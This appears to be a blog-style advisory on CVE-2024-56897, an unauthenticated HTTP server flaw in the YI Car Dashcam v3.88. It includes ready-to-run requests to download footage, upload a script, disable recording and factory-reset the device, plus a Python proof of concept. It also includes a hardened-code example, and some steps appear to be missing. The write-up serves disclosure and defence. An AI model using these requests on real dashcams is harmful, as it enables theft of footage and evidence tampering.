YI Technology is known for its affordable car dashcams, but its model v3.88 is making headlines for all the wrong reasons. CVE-2024-56897 exposes a major hole: improper access control in its built-in HTTP server. This flaw allows not just any nearby attacker, but *anyone on the network* to read or upload files and run powerful API commands with no authentication checks. In this deep-dive, I’ll break down what’s vulnerable, show how it works, and help you grasp what’s at stake.

What is CVE-2024-56897?

CVE-2024-56897 refers to improper access control on the embedded web server of the YI Car Dashcam v3.88. The HTTP interface is supposed to help with configuration and file management — but due to a total lack of security controls, these features are all exposed:

- Shut off recording, mute alerts, or factory-reset the device (evidence tampering)

*Bottom line*: An attacker could silence your dashcam or steal all your video without you noticing.

1. HTTP Server: No Auth, All Ports Open

A quick scan (using nmap or similar) shows the device runs an HTTP server, usually on 192.168.1.254:80 when powered on. Access it from a browser — no login is required.

2. Downloading Video Footage

The video files, typically stored as .mp4 or .mov, are simply there, browsable over plain web requests:

GET /videos/2024_05_15_15_25_42.mp4 HTTP/1.1
Host: 192.168.1.254

Anyone on the same network will get the raw footage as a download.

Need to drop a script or overwrite a config file? The HTTP server doesn’t care:

curl -X POST http://192.168.1.254/upload \
    -F 'file=@evil_script.sh'

4. API Commands for Device Control

The dashcam exposes a REST-like API for settings. For example, you can turn *anything* off, reset, or even wipe storage via requests like:

POST /api/settings
Host: 192.168.1.254
Content-Type: application/json

{
  "action": "disable_recording"
}

or

POST /api/settings
Host: 192.168.1.254
Content-Type: application/json

{
  "action": "factory_reset"
}

Disabling Sounds (example)

POST /api/settings
Content-Type: application/json

{
  "sound": "off"
}

Let’s see a proof-of-concept (PoC) that disables video recording:

import requests

# Settings endpoint of the dashcam's embedded HTTP server (default LAN address)
url = "http://192.168.1.254/api/settings"
payload = {"action": "disable_recording"}

# No credentials are sent: the server accepts the request as-is
resp = requests.post(url, json=payload, timeout=5)
print("Response:", resp.text)

Within seconds, the owner’s dashcam stops saving any new video — possibly erasing critical evidence.
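To make the root cause concrete, here is an added example (not YI firmware or the author's PoC) that models the three exposed surfaces above as a small request dispatcher: the vulnerable form reaches every handler unconditionally, and the hardened form adds the missing access control the CVE describes (a bearer token on every request, a traversal guard on the video path, and validation of the settings body). The `Authorization` header scheme, the `api_token` parameter and the return values are assumptions for illustration.

```python
import hmac
import json
from pathlib import PurePosixPath

# Constructed model of the dashcam's routes; not the real firmware.
VIDEO_ROOT = PurePosixPath("/videos")


def vulnerable_dispatch(method, path, headers, body):
    """Mirrors the flaw: any caller on the network reaches every handler."""
    if method == "GET" and path.startswith("/videos/"):
        return 200, "video bytes"
    if method == "POST" and path == "/upload":
        return 200, "stored"
    if method == "POST" and path == "/api/settings":
        return 200, "applied " + str(json.loads(body).get("action"))
    return 404, "not found"


def hardened_dispatch(method, path, headers, body, *, api_token):
    """Same routes with the access control that is missing in the device."""
    # 1. Authenticate before touching any handler; constant-time compare.
    auth = headers.get("Authorization", "")
    presented = auth[len("Bearer "):].strip() if auth.startswith("Bearer ") else ""
    if not presented or not hmac.compare_digest(presented.encode(), api_token.encode()):
        return 401, "authentication required"
    if method == "GET" and path.startswith("/videos/"):
        # 2. Serve only direct children of the video directory (no traversal).
        requested = PurePosixPath(path)
        if ".." in requested.parts or requested.parent != VIDEO_ROOT:
            return 400, "bad path"
        return 200, "video bytes"
    if method == "POST" and path == "/upload":
        return 200, "stored"  # still reachable, but only by an authenticated caller
    if method == "POST" and path == "/api/settings":
        # 3. Reject malformed bodies instead of crashing inside the handler.
        try:
            action = json.loads(body).get("action")
        except (ValueError, AttributeError):
            return 400, "malformed body"
        return 200, "applied " + str(action)
    return 404, "not found"
```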

- Plant malicious code (if exploitable upload paths exist)

- Silence/trick the camera before or after an incident

Vendor Fix

- None at publication time (YI Technology website, support page)

Conclusion

CVE-2024-56897 is not just another IoT bug — it’s a wide-open door to your dashcam’s data and controls. If you own a YI Car Dashcam v3.88, disconnect it from any network and monitor for firmware updates. The fix is up to the vendor — but awareness, for now, is your only real defense.

Timeline

Published on: 02/24/2025 16:15:12 UTC
Last modified on: 03/03/2025 20:15:43 UTC